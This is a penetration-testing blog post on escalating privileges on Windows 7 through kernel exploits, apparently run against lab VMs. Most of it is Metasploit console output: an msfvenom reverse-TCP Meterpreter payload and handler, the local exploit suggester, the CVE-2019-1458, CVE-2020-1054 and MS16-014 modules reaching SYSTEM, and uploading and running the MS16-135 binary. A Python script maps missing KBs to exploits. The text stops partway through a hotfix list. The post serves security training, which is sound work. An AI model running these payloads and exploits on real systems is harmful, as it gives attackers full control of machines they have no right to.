Windows Kernel Exploits

Posted by r3kind1e on September 19, 2022

Windows Kernel Exploits

Privilege Escalation

Privilege escalation is the process of exploiting a vulnerability or misconfiguration in a system to move from one user's privileges to another's, typically to a user with administrative or root access on the system.

Privilege escalation is a key element of the attack lifecycle and a major determinant of the overall success of a penetration test.

After gaining an initial foothold on a target system, you will need to elevate your privileges to perform tasks and functions that require administrative rights.

The importance of privilege escalation in the penetration testing process cannot be overstated or ignored. Developing your privilege escalation skills will make you a better penetration tester.

Windows Kernel

The kernel is the computer program at the core of an operating system; it has complete control over every resource and piece of hardware on the system. It acts as a translation layer between hardware and software and facilitates communication between the two.

Windows NT is the kernel that ships with every version of Microsoft Windows. It is a hybrid kernel: it operates largely as a traditional kernel, with a few design choices borrowed from microkernel ideas. It has two main modes of operation, which determine what access code gets to system resources and hardware:

User mode - programs and services running in user mode have restricted access to system resources and functionality.

Kernel mode - code running in kernel mode has unrestricted access to system resources and functionality, including the ability to manage devices and system memory.

Windows Kernel Exploitation

Kernel exploitation on Windows typically targets a vulnerability in the Windows kernel (ntoskrnl) or in a kernel-mode driver such as win32k.sys to execute arbitrary code in kernel mode, which is then used to run privileged commands or obtain a SYSTEM shell.

The exact process varies with the version of Windows on the target and the kernel vulnerability being exploited.

Privilege escalation on Windows systems typically follows this method:

Identify a kernel vulnerability (compare the target's OS version and installed hotfixes against known bulletins and CVEs).

Download, compile, and transfer the kernel exploit to the target system, then run it.

Because the exploit runs in kernel mode, a failed attempt usually means a blue screen and a reboot of the target rather than a clean error. Prefer exploits that have been tested on the exact build and service pack you are facing, and make sure the client is aware of the crash risk before running one.

Tools and Environment

Windows-Exploit-Suggester - this tool compares a target's patch level against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. Note that the bulletin spreadsheet it downloads stopped being updated in 2017, when Microsoft moved to the Security Update Guide, so it knows nothing about later vulnerabilities (such as CVE-2019-1458 and CVE-2020-1054 used later in this post); for those, rely on the Metasploit local exploit suggester or a current CVE database.

Github: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Windows-Kernel-Exploits - a collection of Windows kernel exploits sorted by CVE / bulletin number.

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135

Note: the techniques demonstrated in this video were performed on a Windows 7 SP1 VM.

Demo: Windows Kernel Exploits

msf6 > sessions

Active sessions
===============

Id  Name    Type                    Information                     Connection
--  ----    ----                    -----------                     ----------
2           powershell windows      Accountant @ WIN7-PC            10.10.10.10:4444 -> 10.10.10.7:49166 (10.10.10.7)
3           meterpreter x64/windows Win7-PC\Accountant @ WIN7-PC    10.10.10.10:4433 -> 10.10.10.7:49167 (10.10.10.7)
msf6 > sessions 3
meterpreter > getuid
meterpreter > getprivs
meterpreter > getsystem
msf6 > search suggester
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
msf6 post(multi/recon/local_exploit_suggester) > sessions
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 3
msf6 post(multi/recon/local_exploit_suggester) > run

Search for ms10_092_schelevator on Google:

Windows Escalate Task Scheduler XML Privilege Escalation

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.

Search for ms16_014_wmi_recv_notif on Google:

Windows WMI Receive Notification Exploit

This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > set SESSION 3
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > set LPORT 4422
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
meterpreter > getuid
meterpreter > 
background session 4? [y/N]
msf6 exploit(windows/local/ms16_014_wmi_recv_notif) > sessions

Active sessions
===============

Id  Name    Type                    Information                     Connection
--  ----    ----                    -----------                     ----------
2           powershell windows      Accountant @ WIN7-PC            10.10.10.10:4444 -> 10.10.10.7:49166 (10.10.10.7)
3           meterpreter x64/windows Win7-PC\Accountant @ WIN7-PC    10.10.10.10:4433 -> 10.10.10.7:49167 (10.10.10.7)
4           meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7-PC   10.10.10.10:4422 -> 10.10.10.7:49183 (10.10.10.7)

Perform manual privilege escalation:

Windows-Exploit-Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

msf6 post(multi/recon/local_exploit_suggester) > sessions 3
meterpreter > getuid
Server username: Win7-PC\Accountant
meterpreter > shell

C:\Temp>systeminfo

Host Name:          WIN7-PC
OS Name:            Microsoft Windows 7 Ultimate
OS Version:         6.1.7601 Service Pack 1 Build 7601
...
Hotfix(s):          2 Hotfix(s) Installed.
                    [01]: KB2534111
                    [02]: KB976902
C:\Temp > ^C
Terminate channel 12? [y/N]
meterpreter > 

Copy this output (at minimum the OS Name, OS Version and the full Hotfix(s) list).

Open a new terminal and paste the copied output into a file:

cd Desktop
vim win7.txt
ls
cd Windows-Enum/Windows-Exploit-Suggester
ls
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo ~/Desktop/win7.txt

The exploits listed nearest the top of the output (the most recent unpatched bulletins) have the highest chance of being exploited successfully.
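As an added example, not part of the original post or of the Windows-Exploit-Suggester project, here is the core of what the tool does for the two-step method above: parse the `systeminfo` output, pull out the OS version and installed KBs, and flag every bulletin whose fix is absent, newest first. The bulletin table is a hand-picked subset (an assumption of this example; the real tool loads the full MSSB spreadsheet) with the Windows 7 KB numbers for each bulletin, and the `systeminfo` text is constructed to match the format shown on the page.

```python
"""Minimal systeminfo-vs-bulletin triage, in the spirit of Windows-Exploit-Suggester."""
import re

# Hand-picked subset of Windows 7 SP1 kernel/win32k bulletins (assumption: only these
# are checked; the real tool loads the full MSSB spreadsheet). KB numbers are the
# Windows 7 packages for each bulletin; verify them in the Security Update Guide.
BULLETINS = {
    # bulletin: (affected OS version prefix, KBs that fix it, local exploit to try)
    "MS10-092": ("6.1", {"KB2305420"}, "exploit/windows/local/ms10_092_schelevator"),
    "MS14-058": ("6.1", {"KB3000061"}, "exploit/windows/local/ms14_058_track_popup_menu"),
    "MS15-051": ("6.1", {"KB3045171"}, "exploit/windows/local/ms15_051_client_copy_image"),
    "MS16-032": ("6.1", {"KB3139914"}, "exploit/windows/local/ms16_032_secondary_logon_handle_privesc"),
    "MS16-135": ("6.1", {"KB3197867", "KB3197868"}, "windows-kernel-exploits/MS16-135 (41015.exe)"),
}


def parse_systeminfo(text):
    """Extract (OS version string, set of installed KBs) from raw `systeminfo` output."""
    m = re.search(r"^OS Version:\s*(\S+)", text, re.MULTILINE)
    version = m.group(1) if m else ""
    # Hotfixes appear as "[nn]: KBnnnnnnn"; older KBs have six digits, newer seven.
    kbs = set(re.findall(r"\bKB\d{6,7}\b", text))
    return version, kbs


def missing_bulletins(text):
    """Return [(bulletin, exploit)] for bulletins whose fix is absent, newest first.

    Caveat: this only checks the bulletin's own KBs. A later Monthly Rollup supersedes
    them without reinstalling those KB numbers, so a hit is a candidate to confirm on
    the target (e.g. with the Metasploit module's check), not proof of vulnerability.
    """
    version, installed = parse_systeminfo(text)
    hits = []
    for bulletin, (os_prefix, fix_kbs, exploit) in BULLETINS.items():
        if version.startswith(os_prefix) and not (fix_kbs & installed):
            hits.append((bulletin, exploit))
    # Most recent bulletin first: "MSyy-nnn" sorts chronologically as a string.
    return sorted(hits, reverse=True)


# Constructed sample resembling the page's WIN7-PC: SP1 with only two hotfixes.
UNPATCHED = """\
Host Name:          WIN7-PC
OS Name:            Microsoft Windows 7 Ultimate
OS Version:         6.1.7601 Service Pack 1 Build 7601
Hotfix(s):          2 Hotfix(s) Installed.
                    [01]: KB2534111
                    [02]: KB976902
"""

# Constructed sample with every fix from the table applied on top of the above.
PATCHED = UNPATCHED + "".join(
    f"                    [{i:02d}]: {kb}\n"
    for i, kb in enumerate(sorted(kb for _, kbs, _ in BULLETINS.values() for kb in kbs), 3)
)


if __name__ == "__main__":
    for bulletin, exploit in missing_bulletins(UNPATCHED):
        print(f"[+] {bulletin} missing -> try {exploit}")
    print("patched host:", missing_bulletins(PATCHED) or "nothing missing")
```

Run as-is, the WIN7-PC sample reports all five bulletins with MS16-135 first, matching the ordering rule above, and the fully patched sample reports nothing. On a real engagement treat each hit as a candidate only: the Metasploit suggester's per-module check (run against a live session in the Home Lab section below) is what confirms whether the kernel is actually unpatched.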

Search for MS16-135 on Google:

windows-kernel-exploits

MS16-135 x64 Universal

Download 41015.exe, transfer the executable to the target system and run it; that should give elevated privileges. Before dropping a precompiled kernel exploit on a client machine, verify the binary (compare its hash against the repository, or build it from source yourself) and remember that a mismatch between the exploit's offsets and the target build is likely to crash the box.

Use the Meterpreter session to upload the executable to the C:\Temp directory on the target:

meterpreter > cd C:\\
meterpreter > ls
meterpreter > cd Temp\\
meterpreter > ls
meterpreter > upload ~/Downloads/41015.exe
meterpreter > shell

C:\Temp>dir
C:\Temp>.\41015.exe
C:\Temp>.\41015.exe 7

C:\Temp>whoami
nt authority\system

Home Lab

Environment: Windows 7 SP1.

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.248.148 LPORT=1234 -f exe -o payload64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: payload64.exe

Attempting to escalate the unpriv account directly fails.

┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.248.148
LHOST => 192.168.248.148
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.248.148:1234 
[*] Sending stage (200774 bytes) to 192.168.248.150
[*] Meterpreter session 1 opened (192.168.248.148:1234 -> 192.168.248.150:49221) at 2022-10-06 20:25:48 -0400

meterpreter > getuid
Server username: IEWIN7\unpriv
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.248.150 - Collecting local exploits for x64/windows...
[*] 192.168.248.150 - 167 exploit checks are being tried...
[+] 192.168.248.150 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[-] 192.168.248.150 - Post interrupted by the console user
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.248.150 - Collecting local exploits for x64/windows...
[*] 192.168.248.150 - 167 exploit checks are being tried...
[+] 192.168.248.150 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 192.168.248.150 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ikeext_service                           Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms10_092_schelevator                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 12  exploit/windows/local/bypassuac_dotnet_profiler                No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_sdclt                          No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 17  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 18  exploit/windows/local/capcom_sys_exec                          No                       The target is not exploitable.
 19  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 20  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 22  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.
 23  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 24  exploit/windows/local/cve_2020_17136                           No                       Cannot reliably check exploitability. Couldn't retrieve the target's build number!
 25  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.
 26  exploit/windows/local/cve_2021_40449                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 27  exploit/windows/local/cve_2022_21882_win32k                    No                       The target is not exploitable.
 28  exploit/windows/local/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
 29  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 30  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store
 31  exploit/windows/local/ms15_078_atmfd_bof                       No                       Cannot reliably check exploitability.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.
 33  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 34  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The target is not exploitable.
 36  exploit/windows/local/nvidia_nvsvc                             No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 39  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.
 40  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The target is not exploitable.

[*] Post module execution completed

Microsoft Windows Uninitialized Variable Local Privilege Elevation

This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitialized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker chosen address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against a target and can cause the target machine to reboot when the session is terminated.

Using exploit/windows/local/cve_2019_1458_wizardopium to escalate to NT AUTHORITY\SYSTEM:

msf6 post(multi/recon/local_exploit_suggester) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  IEWIN7\unpriv @ IEWIN7  192.168.248.148:1234 -> 192.168.248.150:49173 (192.168.248.150)

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2019_1458_wizardopium
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options

Module options (exploit/windows/local/cve_2019_1458_wizardopium):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.248.148  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64


msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > exploit

[*] Started reverse TCP handler on 192.168.248.148:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 2696 launched.
[*] Reflectively injecting the DLL into 2696...
[*] Sending stage (200774 bytes) to 192.168.248.150
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.248.148:4444 -> 192.168.248.150:49237) at 2022-10-06 22:24:08 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > 

Using windows/local/cve_2020_1054_drawiconex_lpe to escalate to NT AUTHORITY\SYSTEM:

Microsoft CVE-2020-1054: Win32k Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.

msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  IEWIN7\unpriv @ IEWIN7        192.168.248.148:1234 -> 192.168.248.150:49173 (192.168.248.150)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ IEWIN7  192.168.248.148:4444 -> 192.168.248.150:49237 (192.168.248.150)

msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > show options

Module options (exploit/windows/local/cve_2020_1054_drawiconex_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.248.148  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64


msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LPORT 1111
LPORT => 1111
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > exploit

[*] Started reverse TCP handler on 192.168.248.148:1111 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Launching msiexec to host the DLL...
[+] Process 1068 launched.
[*] Reflectively injecting the DLL into 1068...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.248.150
[*] Meterpreter session 4 opened (192.168.248.148:1111 -> 192.168.248.150:49243) at 2022-10-06 22:43:27 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

exploit/windows/local/ikeext_service did not exploit successfully.

IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL

This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.

exploit/windows/local/ms10_092_schelevator did not exploit successfully.

Windows Escalate Task Scheduler XML Privilege Escalation

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.

exploit/windows/local/ms14_058_track_popup_menu ran successfully and returned a meterpreter, but getuid is still IEWIN7\unpriv and getsystem does not work.

Windows TrackPopupMenu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys; the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32 bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

exploit/windows/local/ms15_051_client_copy_image can be exploited, but no meterpreter session was obtained.

Windows ClientCopyImage Win32k Exploit

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Windows WMI Receive Notification Exploit

This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.

Windows Privilege Escalation via TokenMagic (UAC Bypass)

exploit/windows/local/tokenmagic appeared to obtain a shell, but commands could not actually be executed.

This module exploits a UAC bypass (TokenMagic) in order to spawn a process / conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected.

Note that TokenMagic, like the bypassuac_* modules in the suggester output, is a UAC bypass: it only helps when the current user is already a member of Administrators and is running with a filtered (medium integrity) token. A standard user such as unpriv has no high-privilege token to unlock, which is why these modules are not a real escalation path here.

In summary, the exploits that ran successfully on Windows 7 SP1 and returned NT AUTHORITY\SYSTEM are:

Exploit: exploit/windows/local/cve_2019_1458_wizardopium
Name: Microsoft Windows Uninitialized Variable Local Privilege Elevation
URL: https://www.rapid7.com/db/modules/exploit/windows/local/cve_2019_1458_wizardopium/

Exploit: exploit/windows/local/cve_2020_1054_drawiconex_lpe
Name: Microsoft CVE-2020-1054: Win32k Elevation of Privilege Vulnerability
URL: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1054/

Next, manual privilege escalation:

meterpreter > getuid
Server username: IEWIN7\unpriv
meterpreter > shell
Process 3000 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Temp>systeminfo
systeminfo

Host Name:                 IEWIN7
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          
Registered Organization:   Microsoft
Product ID:                00392-972-8000024-85559
Original Install Date:     3/6/2018, 11:10:22 AM
System Boot Time:          10/7/2022, 5:18:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 165 Stepping 2 GenuineIntel ~2304 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 3,144 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,198 MB
Virtual Memory: In Use:    991 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\IEWIN7
Hotfix(s):                 210 Hotfix(s) Installed.
                           [01]: KB2670838
                           [02]: KB2830477
                           [03]: KB2592687
                           [04]: KB971033
                           [05]: KB2479943
                           [06]: KB2491683
                           [07]: KB2506014
                           [08]: KB2506212
                           [09]: KB2506928
                           [10]: KB2509553
                           [11]: KB2532531
                           [12]: KB2533552
                           [13]: KB2534366
                           [14]: KB2545698
                           [15]: KB2547666
                           [16]: KB2552343
                           [17]: KB2560656
                           [18]: KB2562937
                           [19]: KB2563227
                           [20]: KB2564958
                           [21]: KB2574819
                           [22]: KB2579686
                           [23]: KB2585542
                           [24]: KB2598845
                           [25]: KB2603229
                           [26]: KB2604115
                           [27]: KB2620704
                           [28]: KB2621440
                           [29]: KB2631813
                           [30]: KB2640148
                           [31]: KB2653956
                           [32]: KB2654428
                           [33]: KB2656356
                           [34]: KB2660075
                           [35]: KB2667402
                           [36]: KB2685811
                           [37]: KB2685813
                           [38]: KB2685939
                           [39]: KB2690533
                           [40]: KB2698365
                           [41]: KB2705219
                           [42]: KB2706045
                           [43]: KB2719857
                           [44]: KB2726535
                           [45]: KB2727528
                           [46]: KB2729094
                           [47]: KB2729452
                           [48]: KB2732059
                           [49]: KB2732487
                           [50]: KB2736422
                           [51]: KB2742599
                           [52]: KB2750841
                           [53]: KB2758857
                           [54]: KB2761217
                           [55]: KB2763523
                           [56]: KB2770660
                           [57]: KB2773072
                           [58]: KB2786081
                           [59]: KB2789645
                           [60]: KB2791765
                           [61]: KB2799926
                           [62]: KB2800095
                           [63]: KB2807986
                           [64]: KB2808679
                           [65]: KB2813430
                           [66]: KB2834140
                           [67]: KB2836942
                           [68]: KB2836943
                           [69]: KB2840631
                           [70]: KB2843630
                           [71]: KB2847927
                           [72]: KB2852386
                           [73]: KB2853952
                           [74]: KB2857650
                           [75]: KB2861698
                           [76]: KB2862152
                           [77]: KB2862330
                           [78]: KB2862335
                           [79]: KB2864202
                           [80]: KB2868038
                           [81]: KB2871997
                           [82]: KB2884256
                           [83]: KB2888049
                           [84]: KB2891804
                           [85]: KB2892074
                           [86]: KB2893294
                           [87]: KB2893519
                           [88]: KB2894844
                           [89]: KB2900986
                           [90]: KB2908783
                           [91]: KB2911501
                           [92]: KB2912390
                           [93]: KB2918077
                           [94]: KB2919469
                           [95]: KB2923545
                           [96]: KB2931356
                           [97]: KB2937610
                           [98]: KB2943357
                           [99]: KB2952664
                           [100]: KB2966583
                           [101]: KB2968294
                           [102]: KB2970228
                           [103]: KB2972100
                           [104]: KB2972211
                           [105]: KB2973112
                           [106]: KB2973201
                           [107]: KB2973351
                           [108]: KB2977292
                           [109]: KB2978120
                           [110]: KB2978742
                           [111]: KB2984972
                           [112]: KB2984976
                           [113]: KB2985461
                           [114]: KB2991963
                           [115]: KB2992611
                           [116]: KB3003743
